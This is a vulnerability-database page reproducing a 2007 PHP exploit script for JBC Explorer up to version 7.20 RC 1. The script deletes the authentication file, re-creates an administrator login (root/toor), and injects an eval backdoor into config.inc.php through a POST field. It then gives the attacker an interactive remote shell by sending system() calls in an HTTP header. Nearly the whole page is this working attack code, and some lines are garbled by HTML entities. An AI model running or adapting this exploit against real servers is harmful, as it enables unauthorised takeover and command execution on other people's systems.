Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18349
HistoryNov 05, 2007 - 12:00 a.m.

JBC Explorer <= V7.20 RC 1 Remote Code Execution Exploit

2007-11-0500:00:00
vulners.com
73
JSON

#!/usr/bin/php
<?php

This file require the PhpSploit class.

If you want to use this class, the latest

version can be downloaded from acid-root.new.fr.

##################################################
error_reporting(E_ALL ^ E_NOTICE);
require('phpsploitclass.php');

head();
if($argc < 3) usage();

$url = getparam('url', true);
$prx = getparam('proxy', false);
$pra = getparam('proxyauth', false);
$cod = 'eval($_SERVER[HTTP_SHELL]);';

$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(1);
$xpl->cookiejar(1);

if($prx) $xpl->proxy($prx);
if($pra) $xpl->proxyauth($pra);

print "0x01>Deleting the file auth.inc.php";
$xpl->post($url.'dirsys/modules/auth.php', 'suppr=1');

print "\n0x02>Creating the file auth.inc.php";
$xpl->post($url.'dirsys/modules/auth.php', 'login=root&password=toor');

print "\n0x03>Trying to log in as Administrator";
$xpl->post($url.'dirsys/modules/auth.php', 'login=root&password=toor');

// Minimum data necessary (fwrite without quote)
$minimdata =
'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP'.
'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD'.
'_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER'.
'=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE'.
'=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB'.
'UG=0;'.urlencode($cod).'//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE'.
'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1';

print "\n0x04>Creating the file config.inc.php";
$xpl->post($url.'dirsys/modules/config/post.php', $minimdata);
print "\n0x05>Now enter your commands";

do
{
$xpl->addheader('Shell', "@system($cmd);");
$xpl->get($url.'dirsys/config.inc.php');
print $xpl->getcontent()."\n0x06>";
}
while(!eregi('^quit|exit$', $cmd = trim(fgets(STDIN))));

exit(0);

function getparam($param,$opt='')
{
global $argv;

    foreach&#40;$argv as $value =&gt; $key&#41;
    {
            if&#40;$key == &#39;-&#39;.$param&#41;
               return $argv[$value+1];
    }
    
    if&#40;$opt&#41;
       usage&#40;&#41;;
    else
       return FALSE;

}

function head()
{
print
"\nJBC Explorer <= V7.20 RC 1\n".
"Remote Code Execution Exploit\n\n".
"by DarkFig <gmdarkfig (at) gmail (dot) com>\n".
"http://acid-root.new.fr/&#92;n&quot;.
"#[email protected]\n\n";
}

function usage()
{
print
"Usage:\n".
"sploit.php -url <url> [Options]\n\n".
"Options:\n".
"-proxy <proxyhost:proxyport>".
"\n-proxyauth <proxyuser:proxypwd>\n";

    exit&#40;1&#41;;

}

?>

JSON